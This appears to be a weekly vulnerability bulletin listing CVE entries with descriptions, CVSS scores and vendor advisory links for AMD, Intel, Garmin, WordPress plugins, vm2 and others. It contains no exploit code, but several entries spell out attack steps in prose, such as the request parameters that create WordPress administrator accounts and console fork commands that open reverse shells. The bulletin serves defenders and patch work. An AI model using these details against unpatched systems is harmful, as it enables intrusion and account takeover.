| AMD[.]com--AMD EPYC Series 9004 Processors | Improper enforcement of the LFENCE serialization property may allow an attacker to bypass speculation barriers and potentially disclose sensitive information, potentially resulting in loss of confidentiality. | 2026-05-13 | not yet calculated | CVE-2024-36315 | https://www.amd.com/en/resources/product-security/bulletin/AMD-SB-3030.html https://www.amd.com/en/resources/product-security/bulletin/AMD-SB-4017.html |
| AMD[.]com--AMD Radeon RX 7000 Series Graphics Products | Improper isolation of VCN-JPEG HW register space could allow a malicious Guest Virtual Machine (VM) or a process to perform unauthorized access to the register space of the JPEG cores assigned a victim VM/process, potentially gaining arbitrary read/write access to the victim VM/process data. | 2026-05-15 | not yet calculated | CVE-2024-36323 | https://www.amd.com/en/resources/product-security/bulletin/AMD-SB-6027.html |
| AMD[.]com--AMD Radeon PRO V710 | Improper isolation of GPU HW register space could allow a privileged attacker in malicious Guest Virtual Machine (VM) to perform unauthorized access to specific victim range of GPU MMIO register space, potentially causing the host OS to reboot and creating a Denial of Service (DOS) condition. | 2026-05-15 | not yet calculated | CVE-2024-36332 | https://www.amd.com/en/resources/product-security/bulletin/AMD-SB-6027.html |
| AMD[.]com--AMD Radeon RX 5000 Series Graphics Products | A DLL hijacking vulnerability in the AMD Cleanup Utility could allow an attacker to achieve privilege escalation potentially resulting in arbitrary code execution. | 2026-05-15 | not yet calculated | CVE-2024-36333 | https://www.amd.com/en/resources/product-security/bulletin/AMD-SB-6027.html |
| AMD[.]com--AMD Radeon RX 7000 Series Graphics Products | Improper verification of cryptographic signature in the Radeon RGB tool could allow a malicious file placed in the installation directory to be run with elevated privileges potentially leading to arbitrary code execution. | 2026-05-15 | not yet calculated | CVE-2024-36334 | https://www.amd.com/en/resources/product-security/bulletin/AMD-SB-6027.html |
| AMD[.]com--AMD EPYC 4004 | Improper input validation in the AMD OverDrive (AOD) System Management Mode (SMM) module could allow a privileged attacker to perform an out-of-bounds read, potentially resulting in loss of confidentiality. | 2026-05-15 | not yet calculated | CVE-2024-36345 | https://www.amd.com/en/resources/product-security/bulletin/AMD-SB-3030.html https://www.amd.com/en/resources/product-security/bulletin/AMD-SB-4017.html |
| Checkmk GmbH--Checkmk | Privilege escalation in the mk_mysql agent plugin on Windows in Checkmk <2.4.0p29, <2.3.0p47, and 2.2.0 (EOL) allows a local unprivileged user able to create a Windows service whose name matches 'MySQL' or 'MariaDB' (or with write access to a binary referenced by such a service) to execute arbitrary code in the context of the Checkmk agent service, which typically runs as SYSTEM. | 2026-05-13 | not yet calculated | CVE-2024-47091 | https://checkmk.com/werk/19198 |
| n/a--Ardupilot | Buffer Overflow vulnerability in Ardupilot rover commit v.c56439b045162058df0ff136afea3081fcd06d38 allows a local attacker to cause a denial of service via the AP_InertialSensor_ADIS1647x.cpp, ArduRover, ADIS1647x Sensor component. | 2026-05-13 | not yet calculated | CVE-2024-48519 | https://github.com/ArduPilot/ardupilot/issues/27937 |
| n/a--Ardupilot | Buffer Overflow vulnerability in Ardupiot Copter Latest commit 92693e023793133e49a035daf37c14433e484778 allows a local attacker to cause a denial of service via the AP_MSP::loop, AP_MSP, AP_MSP.cpp components. | 2026-05-13 | not yet calculated | CVE-2024-51394 | https://github.com/ArduPilot/ardupilot/issues/28458 |
| n/a--Ardupilot | Buffer Overflow vulnerability in Ardupiot Copter Latest commit 92693e023793133e49a035daf37c14433e484778 allows a local attacker to cause a denial of service via the AP_SmartAudio::loop, AP_SmartAudio, AP_SmartAudio.cpp components. | 2026-05-13 | not yet calculated | CVE-2024-51395 | https://github.com/ArduPilot/ardupilot/issues/28374 |
| n/a--FMT-Firmware | Firmament-Autopilot FMT-Firmware commit de5aec was discovered to contain a buffer overflow via the task_mavobc_entry function at /comm/task_comm.c. | 2026-05-13 | not yet calculated | CVE-2024-55045 | https://github.com/Firmament-Autopilot/FMT-Firmware/issues/133 |
| AMD[.]com--AMD Ryzen 7035 Series Processors with Radeon Graphics (formerly codenamed "Rembrandt R") | An unchecked return value within the AMD Platform Management Framework (PMF) could allow an attacker to read or modify an arbitrary address potentially resulting in loss of confidentiality, integrity, or availability. | 2026-05-15 | not yet calculated | CVE-2025-0028 | https://www.amd.com/en/resources/product-security/bulletin/AMD-SB-4015.html |
| AMD[.]com--AMD Ryzen 7040 Series Mobile Processors with Radeon Graphics | Improper access control between the Joint Test Action Group (JTAG) and Advanced Extensible Interface (AXI) could allow an attacker with physical access to read or overwrite the contents of cross-chip debug (XCD) registers potentially resulting in loss of data integrity or confidentiality. | 2026-05-15 | not yet calculated | CVE-2025-0040 | https://www.amd.com/en/resources/product-security/bulletin/AMD-SB-4017.html https://www.amd.com/en/resources/product-security/bulletin/AMD-SB-6027.html |
| AMD[.]com--AMD Ryzen Al Max+ | An out-of-bounds read in power management firmware by a malicious local attacker with low privileges could potentially lead to a partial loss of confidentiality and availability. | 2026-05-15 | not yet calculated | CVE-2025-0044 | https://www.amd.com/en/resources/product-security/bulletin/AMD-SB-6027.html |
| AMD[.]com--Athlon 3000 Series Mobile Processors with Radeon Graphics | Improper Input validation in the AMD Secure Processor (ASP) PCI driver may allow a local attacker to create a buffer overflow condition, potentially resulting in a crash or denial of service | 2026-05-15 | not yet calculated | CVE-2025-0045 | https://www.amd.com/en/resources/product-security/bulletin/AMD-SB-4015.html https://www.amd.com/en/resources/product-security/bulletin/AMD-SB-3047.html |
| WSO2--WSO2 Identity Server | Due to a lack of user account state validation during authentication, locked user accounts can be successfully authenticated using Magic Link or Pass Key methods. This bypasses the intended security control that should prevent access to accounts that have been locked. This vulnerability may allow unauthorized access to applications and sensitive data associated with accounts that should have been restricted via the account lock mechanism. It also undermines the effectiveness of the account lock mechanism intended to prevent further login attempts. | 2026-05-11 | not yet calculated | CVE-2025-10908 | https://security.docs.wso2.com/en/latest/security-announcements/security-advisories/2026/WSO2-2025-4388/ |
| Siemens--Simcenter Femap | The affected applications contains a memory corruption vulnerability while parsing specially crafted IPT files. This could allow an attacker to execute code in the context of the current process. (ZDI-CAN-27349, ZDI-CAN-27389) | 2026-05-12 | not yet calculated | CVE-2025-12659 | https://cert-portal.siemens.com/productcert/html/ssa-870926.html |
| silabs.com--Simplicity SDK | * Countermeasures for DPA within SYMCRYPTO engine on SixG301xxx devices are not sufficiently random and will eventually repeat. * KSU keys using SYMCRYPTO will be impacted by this vulnerability. | 2026-05-15 | not yet calculated | CVE-2025-14972 | https://community.silabs.com/068Vm00000M3cAX |
| n/a--Intel(R) Ethernet 800 series | Use after free for some Linux kernel driver for the Intel(R) Ethernet 800 series before version 2.3.14 within Ring 0: Kernel may allow a denial of service. Unprivileged software adversary with an authenticated user combined with a low complexity attack may enable denial of service. This result may potentially occur via local access when attack requirements are present without special internal knowledge and requires no user interaction. The potential vulnerability may impact the confidentiality (none), integrity (none) and availability (high) of the vulnerable system, resulting in subsequent system confidentiality (none), integrity (none) and availability (high) impacts. | 2026-05-12 | not yet calculated | CVE-2025-27723 | https://intel.com/content/www/us/en/security-center/advisory/intel-sa-01426.html |
| Garmin[.]com--Garmin WDU | The locally served web site on the Garmin WDU (v1 1.4.6 and v2 5.0) allows a symlink attack. If a malicious graphics package containing symlinks is uploaded, the web server follows the supplied links when serving content. No mechanisms to restrict those link targets to a specific area of the filesystem is enabled. This allows an attacker to retrieve arbitrary files from the device. | 2026-05-13 | not yet calculated | CVE-2025-27850 | https://garmin.com https://www8.garmin.com/support/ch.jsp?product=010-02642-00 |
| Garmin[.]com--Garmin WDU | The locally served web site on the Garmin WDU (v1 1.4.6 and v2 5.0) allows a cross-site origin WebSocket hijacking attack. Among other uses, the WDU utilizes WebSockets to control settings, including administrative settings. This allows a network attacker to take full control of a WDU. To initiate an exploit of this vulnerability, the victim must (1) be utilizing a web browser on a multihomed host that has local interfaces on the Garmin Marine Network as well as another network, and (2) access a malicious third party website created by the attacker. | 2026-05-13 | not yet calculated | CVE-2025-27851 | https://garmin.com https://www8.garmin.com/support/ch.jsp?product=010-02642-00 |
| Garmin[.]com--Garmin WDU | The locally served web site on the Garmin WDU (v1 1.4.6 and v2 5.0) allows a reflected cross site scripting (XSS) attack. This allows an attacker on the local network segment to execute arbitrary JavaScript code within the context of the WDU webpage. Full administrator level access to the device is possible. To initiate an exploit of this vulnerability, the victim must execute two actions: (1) view a specific URL served by the WDU, and (2) click an element on the rendered page. | 2026-05-13 | not yet calculated | CVE-2025-27852 | https://garmin.com https://www8.garmin.com/support/ch.jsp?product=010-02642-00 |
| Garmin[.]com--Garmin WDU | The locally served web site on the Garmin WDU (v1 1.4.6 and v2 5.0) allows its authentication to be bypassed. The WDU web site only performs authentication with the client within the client's browser. The WebSockets used to communicate with the WDU server do not enforce any authentication. An attacker may bypass all authentication mechanisms by directly utilizing the remote APIs available on the websocket. | 2026-05-13 | not yet calculated | CVE-2025-27853 | https://garmin.com https://www8.garmin.com/support/ch.jsp?product=010-02642-00 |
| ThreadReadButtons--ThreadReadButtons | striso-control-firmware 54c9722 is vulnerable to Buffer Overflow in function ThreadReadButtons. | 2026-05-13 | not yet calculated | CVE-2025-28343 | https://github.com/striso/striso-control-firmware/issues/5 |
| AuxJack--AuxJack | striso-control-firmware 54c9722 is vulnerable to Buffer Overflow in function AuxJack. | 2026-05-13 | not yet calculated | CVE-2025-28344 | https://github.com/striso/striso-control-firmware/issues/6 |
| NXP[.]com--NXP | NXP moal.ko Wi-Fi driver 5.1.7.10 FW version from v17.92.1.p149.43 To v17.92.1.p149.157 was discovered to contain a buffer overflow via the mod_para parameter in the woal_init_module_param function. | 2026-05-13 | not yet calculated | CVE-2025-29338 | https://www.nxp.com/docs/en/release-note/RN00104.pdf https://github.com/masjadaan/CVE-2025-29338 |
| AMD[.]com--AMD Ryzen 7035 Series Processors with Radeon Graphics (formerly codenamed "Rembrandt R") | An out of bounds write within the AMD Platform Management Framework (PMF) could allow an attacker to execute arbitrary code at an elevated privilege level potentially leading to loss of confidentiality integrity, or availability. | 2026-05-15 | not yet calculated | CVE-2025-29935 | https://www.amd.com/en/resources/product-security/bulletin/AMD-SB-4015.html |
| AMD[.]com--AMD Ryzen 7035 Series Processors with Radeon Graphics (formerly codenamed "Rembrandt R") | Improper input validation within the AMD Platform Management Framework (PMF) could allow an attacker to unmap arbitrary memory pages potentially impacting integrity and availability, or allowing privilege escalation resulting in loss of confidentiality. | 2026-05-15 | not yet calculated | CVE-2025-29936 | https://www.amd.com/en/resources/product-security/bulletin/AMD-SB-4015.html |
| AMD[.]com--AMD Ryzen 7035 Series Processors with Radeon Graphics (formerly codenamed "Rembrandt R") | An out of bounds read within the AMD Platform Management Framework (PMF) could allow an attacker to trigger a read of an arbitrary memory location potentially resulting in loss of availability or confidentiality. | 2026-05-15 | not yet calculated | CVE-2025-29937 | https://www.amd.com/en/resources/product-security/bulletin/AMD-SB-4015.html |
| AMD[.]com--AMD Ryzen 7035 Series Processors with Radeon Graphics (formerly codenamed "Rembrandt R") | An unchecked return value within the AMD Platform Management Framework (PMF) could allow an attacker to write to an arbitrary memory address resulting in denial of service or arbitrary code execution. | 2026-05-15 | not yet calculated | CVE-2025-29938 | https://www.amd.com/en/resources/product-security/bulletin/AMD-SB-4015.html |
| AMD[.]com--AMD Ryzen 4000 Series Mobile Processors with Radeon Graphics (formerly codenamed "Renoir") | A buffer overflow vulnerability within AMD Sensor Fusion Hub Driver can allow a local attacker to write out of bounds, potentially resulting in denial of service or crash | 2026-05-15 | not yet calculated | CVE-2025-29944 | https://www.amd.com/en/resources/product-security/bulletin/AMD-SB-4015.html |
| Significant-Gravitas--AutoGPT | AutoGPT is a platform that allows users to create, deploy, and manage continuous artificial intelligence agents that automate complex workflows. In AutoGPT, the execution process is recorded to the console (stdout/stderr), and deployed in container mode, which is automatically captured by Docker and stored as "container logs". However, prior to 0.6.32, there is no limit on the log size when the container is deployed. When the number of user accesses is too large, the log on the server disk will be too large, causing disk resource exhaustion and eventually causing DoS. autogpt-platform-beta-v0.6.32 fixes the issue. | 2026-05-13 | not yet calculated | CVE-2025-32425 | https://github.com/Significant-Gravitas/AutoGPT/security/advisories/GHSA-vw3v-whvp-33v5 https://github.com/Significant-Gravitas/AutoGPT/commit/57a06f70883ce6be18738c6ae8bb41085c71e266 https://github.com/Significant-Gravitas/AutoGPT/blob/62361ccc48327b3124549543b45d933d16f622d2/autogpt_platform/autogpt_libs/autogpt_libs/logging/config.py#L83-L102 https://github.com/Significant-Gravitas/AutoGPT/blob/62361ccc48327b3124549543b45d933d16f622d2/autogpt_platform/docker-compose.platform.yml#L102-L142 |
| Intel[.]com--Intel(R) Server Firmware Update Utility Software | Uncontrolled search path for some Intel(R) Server Firmware Update Utility Software before version 16.0.12. within Ring 3: User Applications may allow an escalation of privilege. System software adversary with an authenticated user combined with a high complexity attack may enable escalation of privilege. This result may potentially occur via local access when attack requirements are present without special internal knowledge and requires active user interaction. The potential vulnerability may impact the confidentiality (high), integrity (high) and availability (high) of the vulnerable system, resulting in subsequent system confidentiality (none), integrity (none) and availability (none) impacts. | 2026-05-12 | not yet calculated | CVE-2025-35969 | https://intel.com/content/www/us/en/security-center/advisory/intel-sa-01410.html |
| Intel[.]com--Intel(R) Processors | Exposure of sensitive information caused by shared microarchitectural predictor state that influences transient execution for some Intel(R) Processors within VMX non-root (guest) operation may allow an information disclosure. Unprivileged software adversary with an authenticated user combined with a high complexity attack may enable data exposure. This result may potentially occur via local access when attack requirements are present without special internal knowledge and requires no user interaction. The potential vulnerability may impact the confidentiality (high), integrity (none) and availability (none) of the vulnerable system, resulting in subsequent system confidentiality (high), integrity (none) and availability (none) impacts. | 2026-05-12 | not yet calculated | CVE-2025-35979 | https://intel.com/content/www/us/en/security-center/advisory/intel-sa-01420.html |
| Intel[.]com--Intel Endpoint Management Assistant (EMA) software | Improper input validation for some Intel Endpoint Management Assistant (EMA) software before version 1.14.5 within Ring 3: User Applications may allow an escalation of privilege. Unprivileged software adversary with an unauthenticated user combined with a low complexity attack may enable escalation of privilege. This result may potentially occur via adjacent access when attack requirements are not present without special internal knowledge and requires no user interaction. The potential vulnerability may impact the confidentiality (high), integrity (high) and availability (high) of the vulnerable system, resulting in subsequent system confidentiality (none), integrity (none) and availability (none) impacts. | 2026-05-12 | not yet calculated | CVE-2025-35990 | https://intel.com/content/www/us/en/security-center/advisory/intel-sa-01434.html |
| Intel[.]com--Intel platforms | Improper initialization in the UEFI firmware for some Intel platforms within Ring 0: Bare Metal OS may allow an information disclosure. System software adversary with a privileged user combined with a high complexity attack may enable data exposure. This result may potentially occur via local access when attack requirements are present without special internal knowledge and requires no user interaction. The potential vulnerability may impact the confidentiality (high), integrity (none) and availability (none) of the vulnerable system, resulting in subsequent system confidentiality (none), integrity (none) and availability (none) impacts. | 2026-05-12 | not yet calculated | CVE-2025-35991 | https://intel.com/content/www/us/en/security-center/advisory/intel-sa-01413.html |
| Intel[.]com--Display Virtualization for Windows OS driver software | Improper buffer restrictions for some Display Virtualization for Windows OS driver software within Ring 2: Device Drivers may allow a denial of service. Unprivileged software adversary with an authenticated user combined with a low complexity attack may enable denial of service. This result may potentially occur via local access when attack requirements are not present without special internal knowledge and requires no user interaction. The potential vulnerability may impact the confidentiality (none), integrity (none) and availability (high) of the vulnerable system, resulting in subsequent system confidentiality (none), integrity (none) and availability (none) impacts. | 2026-05-12 | not yet calculated | CVE-2025-36510 | https://intel.com/content/www/us/en/security-center/advisory/intel-sa-01430.html |
| Intel[.]com--AI Playground software | Uncontrolled search path for some AI Playground software before version 3.0.0 alpha within Ring 3: User Applications may allow an escalation of privilege. Unprivileged software adversary with an authenticated user combined with a high complexity attack may enable escalation of privilege. This result may potentially occur via local access when attack requirements are present without special internal knowledge and requires active user interaction. The potential vulnerability may impact the confidentiality (high), integrity (high) and availability (high) of the vulnerable system, resulting in subsequent system confidentiality (none), integrity (none) and availability (none) impacts. | 2026-05-12 | not yet calculated | CVE-2025-36515 | https://intel.com/content/www/us/en/security-center/advisory/intel-sa-01438.html |
Vulnerability Summary for the Week of May 4, 2026
Posted on Monday May 11, 2026
High Vulnerabilities
| Primary Vendor -- Product |
Description | Published | CVSS Score | Source Info | Patch Info |
|---|---|---|---|---|---|
| gotenberg--gotenberg | Gotenberg is a Docker-powered stateless API for PDF files. In versions 8.30.1 and earlier, the metadata write endpoint validates metadata keys for control characters but leaves metadata values unsanitized. A newline character in a metadata value splits the ExifTool stdin line into two separate arguments, allowing injection of arbitrary ExifTool pseudo-tags such as -FileName, -Directory, -SymLink, and -HardLink. This is a bypass of the incomplete key-sanitization fix introduced in v8.30.1. An unauthenticated attacker can rename or move any PDF being processed to an arbitrary path in the container filesystem, overwrite arbitrary files, or create symlinks and hard links at arbitrary paths. | 2026-05-06 | 10 | CVE-2026-40281 | https://github.com/gotenberg/gotenberg/security/advisories/GHSA-q7r4-hc83-hf2q https://github.com/gotenberg/gotenberg/commit/405f1069c026bb08f319fb5a44e5c67c33208318 |
| jkroepke--openvpn-auth-oauth2 | openvpn-auth-oauth2 is a plugin/management interface client for OpenVPN server to handle an OIDC based single sign-on (SSO) auth flows. From version 1.26.3 to before version 1.27.3, when openvpn-auth-oauth2 is deployed in the experimental plugin mode (shared library loaded by OpenVPN via the plugin directive), clients that do not support WebAuth/SSO (e.g., the openvpn CLI on Linux) are incorrectly admitted to the VPN despite being denied by the authentication logic. The default management-interface mode is not affected because it does not use the OpenVPN plugin return-code mechanism. This issue has been patched in version 1.27.3. | 2026-05-08 | 10 | CVE-2026-41070 | https://github.com/jkroepke/openvpn-auth-oauth2/security/advisories/GHSA-246w-jgmq-88fg https://github.com/jkroepke/openvpn-auth-oauth2/commit/36f69a6c67c1054da7cbfa04ced3f0555127c8f2 |
| gitroomhq--postiz-app | Postiz is an AI social media scheduling tool. Prior to commit da44801, a "Pwn Request" vulnerability in the Build and Publish PR Docker Image workflow (.github/workflows/pr-docker-build.yml) allows any unauthenticated user to execute arbitrary code during the Docker build process and exfiltrate a highly privileged GITHUB_TOKEN (write-all permissions). This can be achieved simply by opening a Pull Request from a fork with a maliciously modified Dockerfile.dev. This issue has been patched via commit da44801. | 2026-05-08 | 10 | CVE-2026-42298 | https://github.com/gitroomhq/postiz-app/security/advisories/GHSA-v975-9h5p-xhm4 https://github.com/gitroomhq/postiz-app/commit/da448012dd87e94944cbe83a38e7fd023269ec46 |
| GeoVision Inc.--GV-VMS V20.0.2 | GV-VMS V20 is a Video Monitoring Software used to gather the feeds of many surveillance cameras and manage other security devices. It is a native application accessed locally, but it is also possible to enable remote access via the "WebCam Server" feature. Once enabled, it is possible to access to the management and monitoring feature via a regular Web interface. This webersever is another native application, compiled without ASLR, which makes exploitation much easier and more likely. Most of the features require authentication before being reachable and leverage a standard login page to grant access. However the `gvapi` endpoint uses its own authentication mechanism via an `HTTP Authorization` header. It supports both `Basic` authentication and the `Digest` modes of authentication. #### Stack-overflow via unbound copy of base64 decoded string The `b64decoder` string is sized dynamically, but it is then copied to the `Buffer` stack variable one character at the time at [0], and there's no bound-check. As such, if the decoded string is bigger than 256 characters (the size of the `Buffer` variable) then a stack overflow occurs. Because the data can be fully controlled by an attacker and lack of ASLR, this vulnerability can easily be exploited to gain full code execution as SYSTEM on the machine running the service. | 2026-05-04 | 10 | CVE-2026-42369 | https://www.geovision.com.tw/cyber_security.php https://https://talosintelligence.com/vulnerability_reports/ |
| Microsoft--Azure DevOps | Exposure of sensitive information to an unauthorized actor in Azure DevOps allows an unauthorized attacker to disclose information over a network. | 2026-05-07 | 10 | CVE-2026-42826 | Azure DevOps Information Disclosure Vulnerability |
| Eclipse Foundation--Eclipse BaSyx | In Eclipse BaSyx Java Server SDK versions prior to 2.0.0-milestone-10, inadequate path normalization in the Submodel HTTP API allows an unauthenticated remote attacker to perform a path traversal attack. By supplying a maliciously crafted fileName parameter during a file upload operation, an attacker can bypass intended storage boundaries and write arbitrary files to any location on the host filesystem accessible by the Java process. This can lead to Remote Code Execution (RCE) and complete system compromise. | 2026-05-05 | 10 | CVE-2026-7411 | https://gitlab.eclipse.org/security/vulnerability-reports/-/issues/423 https://gitlab.eclipse.org/security/cve-assignment/-/issues/102 |
| Opencart--opencart | OpenCart 3.0.3.8 contains a session fixation vulnerability that allows attackers to hijack user sessions by injecting arbitrary values into the OCSESSID cookie. Attackers can set malicious OCSESSID cookie values that the server accepts and maintains, enabling session takeover and unauthorized access to user accounts. | 2026-05-10 | 9.8 | CVE-2021-47923 | ExploitDB-50555 Official Product Homepage VulnCheck Advisory: OpenCart 3.0.3.8 Session Fixation via OCSESSID Cookie |
| thecartpress--TheCartPress | WordPress TheCartPress 1.5.3.6 contains an unauthenticated privilege escalation vulnerability that allows attackers to create administrator accounts by submitting crafted requests to the AJAX handler. Attackers can send POST requests to the tcp_register_and_login_ajax action with tcp_role set to administrator to gain full administrative access without authentication. | 2026-05-10 | 9.8 | CVE-2021-47932 | ExploitDB-50378 Official Product Homepage VulnCheck Advisory: WordPress TheCartPress 1.5.3.6 Privilege Escalation Unauthenticated |
| mstore--MStore API | WordPress MStore API 2.0.6 contains an arbitrary file upload vulnerability that allows unauthenticated attackers to upload malicious files by sending POST requests to the REST API endpoint. Attackers can upload PHP files with arbitrary names to the config_file endpoint to achieve remote code execution on the server. | 2026-05-10 | 9.8 | CVE-2021-47933 | ExploitDB-50379 Official Product Homepage VulnCheck Advisory: WordPress MStore API 2.0.6 Arbitrary File Upload |
| Opencats--OpenCATS | OpenCATS 0.9.4 contains a remote code execution vulnerability that allows unauthenticated attackers to execute arbitrary commands by uploading malicious PHP files disguised as resume attachments. Attackers can upload PHP payloads through the careers job application endpoint and execute system commands via POST requests to the uploaded file in the upload directory. | 2026-05-10 | 9.8 | CVE-2021-47936 | ExploitDB-50585 Official Product Homepage Product Reference VulnCheck Advisory: OpenCATS 0.9.4 Remote Code Execution via Resume Upload |
| download-from-files--Download From Files | WordPress Plugin Download From Files version 1.48 and earlier contains an arbitrary file upload vulnerability that allows unauthenticated attackers to upload malicious files by exploiting the AJAX fileupload action. Attackers can send POST requests to the admin-ajax.php endpoint with the download_from_files_617_fileupload action, manipulating the allowExt parameter to bypass file type restrictions and upload executable files like PHP shells to the web root. | 2026-05-10 | 9.8 | CVE-2021-47940 | ExploitDB-50287 Official Product Homepage VulnCheck Advisory: WordPress Download From Files 1.48 Arbitrary File Upload |
| equinox--[OSGi | Eclipse Equinox OSGi versions 3.8 through 3.18 contain a remote code execution vulnerability in the console interface that allows unauthenticated attackers to execute arbitrary code by exploiting the fork command functionality. Attackers can establish a telnet connection to the OSGi console, perform a telnet handshake, and send fork commands to download and execute malicious Java code, establishing a reverse shell connection. | 2026-05-05 | 9.8 | CVE-2023-54342 | ExploitDB-51878 VulnCheck Advisory: Eclipse Equinox OSGi 3.8-3.18 Console Remote Code Execution |
| equinox--[OSGi | Eclipse Equinox OSGi 3.7.2 and earlier contains a remote code execution vulnerability that allows unauthenticated attackers to execute arbitrary commands by sending payloads to the console interface. Attackers can connect to the OSGi console port and send base64-encoded bash commands wrapped in fork directives to achieve code execution and establish reverse shell connections. | 2026-05-05 | 9.8 | CVE-2023-54344 | ExploitDB-51879 VulnCheck Advisory: Eclipse Equinox OSGi 3.7.2 Remote Code Execution via Console |
| dreamstechnologies--Mentoring | The Mentoring plugin for WordPress is vulnerable to privilege escalation in all versions up to, and including, 1.2.8. This is due to the plugin not properly restricting the roles that users can register with in the mentoring_process_registration() function. This makes it possible for unauthenticated attackers to register with administrator-level user accounts. | 2026-05-05 | 9.8 | CVE-2025-13618 | https://www.wordfence.com/threat-intel/vulnerabilities/id/7192fb4c-0434-4e11-a2a7-c205b8d6b68e?source=cve https://themeforest.net/item/mentoring-education-wordpress-theme/36457081 https://mentoring-wp.dreamsmarketplace.com/documentation/changelog.html |
| Tegsoft Management and Information Services Trade Limited Company--Online Support Application | Improper neutralization of input during web page generation ('cross-site scripting') vulnerability in Tegsoft Management and Information Services Trade Limited Company Online Support Application allows Reflected XSS. This issue affects Online Support Application: from V3 through 31122025. | 2026-05-04 | 9.8 | CVE-2025-14320 | https://www.usom.gov.tr/bildirim/tr-26-0142 |
| patriksimek--vm2 | vm2 is an open source vm/sandbox for Node.js. Prior to version 3.11.0, VM2 suffers from a sandbox breakout vulnerability. This allows attackers to write code which can escape from the VM2 sandbox and execute arbitrary commands on the host system. This issue has been patched in version 3.11.0. | 2026-05-04 | 9.8 | CVE-2026-24118 | https://github.com/patriksimek/vm2/security/advisories/GHSA-grj5-jjm8-h35p https://github.com/patriksimek/vm2/commit/2b5f3e3a060d9088f5e1cdd585d683d491f990a3 https://github.com/patriksimek/vm2/commit/f9b700b1c7d9ef2df416666cb24e0b659140cc74 https://github.com/patriksimek/vm2/releases/tag/v3.11.0 |
| patriksimek--vm2 | vm2 is an open source vm/sandbox for Node.js. Prior to version 3.10.5, the fix for CVE-2023-37466 is insufficient and can be circumvented allowing attackers to write code which can escape from the VM2 sandbox and execute arbitrary commands on the host system. This issue has been patched in version 3.10.5. | 2026-05-04 | 9.8 | CVE-2026-24120 | https://github.com/patriksimek/vm2/security/advisories/GHSA-qvjj-29qf-hp7p https://github.com/patriksimek/vm2/releases/tag/v3.10.5 |
| patriksimek--vm2 | vm2 is an open source vm/sandbox for Node.js. Prior to version 3.11.0, VM2 suffers from a sandbox breakout vulnerability through the inspect function. This allows attackers to write code which can escape from the VM2 sandbox and execute arbitrary commands on the host system. This issue has been patched in version 3.11.0. | 2026-05-04 | 9.8 | CVE-2026-24781 | https://github.com/patriksimek/vm2/security/advisories/GHSA-v37h-5mfm-c47c https://github.com/patriksimek/vm2/commit/8d30d93213c1898b3e035298b89a814970dd1189 https://github.com/patriksimek/vm2/commit/bdd3d15e57bc4ec5e70365cd79f7cb0256e5f88c https://github.com/patriksimek/vm2/commit/fd266d084e0a3322d0f71ba2a8dc4c96cd030228 https://github.com/patriksimek/vm2/releases/tag/v3.11.0 |
| Qualcomm, Inc.--Snapdragon | Buffer overflow due to incorrect authorization in PLC FW | 2026-05-04 | 9.6 | CVE-2026-25293 | https://docs.qualcomm.com/product/publicresources/securitybulletin/may-2026-bulletin.html |
| patriksimek--vm2 | vm2 is an open source vm/sandbox for Node.js. Prior to version 3.11.0, SuppressedError allows attackers to escape the sandbox and run arbitrary code. This issue has been patched in version 3.11.0. | 2026-05-04 | 9.8 | CVE-2026-26332 | https://github.com/patriksimek/vm2/security/advisories/GHSA-55hx-c926-fr95 https://github.com/patriksimek/vm2/releases/tag/v3.11.0 |
| patriksimek--vm2 | vm2 is an open source vm/sandbox for Node.js. In version 3.10.4, vm2 is vulnerable to full sandbox escape with arbitrary code execution. Attacker code inside VM.run() obtains host process object and runs host commands with zero host cooperation. This issue has been patched in version 3.10.5. | 2026-05-04 | 9.8 | CVE-2026-26956 | https://github.com/patriksimek/vm2/security/advisories/GHSA-ffh4-j6h5-pg66 https://github.com/patriksimek/vm2/releases/tag/v3.10.5 |
| OpenCTI-Platform--opencti | OpenCTI is an open source platform for managing cyber threat intelligence knowledge and observables. In versions 6.6.0 through 6.9.12, there is a privilege escalation vulnerability that can be exploited by unauthenticated attackers to query the API as any existing user, including the default admin account. This issue has been fixed in version 6.9.13. As a workaround, the default admin can be disabled using the `APP__ADMIN__EXTERNALLY_MANAGED` configuration. | 2026-05-05 | 9.8 | CVE-2026-27960 | https://github.com/OpenCTI-Platform/opencti/security/advisories/GHSA-6vvv-vmfr-xhrx |
| Microsoft--Azure Managed Instance for Apache Cassandra | Improper access control in Azure Managed Instance for Apache Cassandra allows an authorized attacker to execute code over a network. | 2026-05-07 | 9.9 | CVE-2026-33109 | Azure Managed Instance for Apache Cassandra Remote Code Execution Vulnerability |
| Microsoft--Microsoft Teams | Improper authorization in Microsoft Teams allows an authorized attacker to disclose information over a network. | 2026-05-07 | 9.6 | CVE-2026-33823 | Microsoft Team Events Portal Information Disclosure Vulnerability |
| Microsoft--Azure Managed Instance for Apache Cassandra | Improper input validation in Azure Managed Instance for Apache Cassandra allows an authorized attacker to execute code over a network. | 2026-05-07 | 9 | CVE-2026-33844 | Azure Managed Instance for Apache Cassandra Remote Code Execution Vulnerability |
| Microsoft--Azure Cloud Shell | Improper neutralization of special elements used in a command ('command injection') in Azure Cloud Shell allows an unauthorized attacker to perform spoofing over a network. | 2026-05-07 | 9.6 | CVE-2026-35428 | Azure Cloud Shell Spoofing Vulnerability |
| Saleswonder LLC--WebinarIgnition | Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Saleswonder LLC WebinarIgnition allows Blind SQL Injection. This issue affects WebinarIgnition: from n/a through 4.08.253. | 2026-05-05 | 9.3 | CVE-2026-40797 | https://patchstack.com/database/wordpress/plugin/webinar-ignition/vulnerability/wordpress-webinarignition-plugin-4-06-08-sql-injection-vulnerability?_s_id=cve |
| Spring--Spring Cloud Config | Spring Cloud Config allows applications to serve arbitrary text and binary files through the spring-cloud-config-server module. A malicious user, or attacker, can send a request using a specially crafted URL that can lead to a directory traversal attack. Spring Cloud Config 3.1.x: affected from 3.1.0 through 3.1.13 (inclusive); upgrade to 3.1.14 or greater (Enterprise Support Only). Spring Cloud Config 4.1.x: affected from 4.1.0 through 4.1.9 (inclusive); upgrade to 4.1.10 or greater (Enterprise Support Only). Spring Cloud Config 4.2.x: affected from 4.2.0 through 4.2.6 (inclusive); upgrade to 4.2.7 or greater (Enterprise Support Only). Spring Cloud Config 4.3.x: affected from 4.3.0 through 4.3.2 (inclusive); upgrade to 4.3.3 or greater. Spring Cloud Config 5.0.x: affected from 5.0.0 through 5.0.2 (inclusive); upgrade to 5.0.3 or greater. | 2026-05-07 | 9.1 | CVE-2026-40982 | https://spring.io/security/cve-2026-40982 |
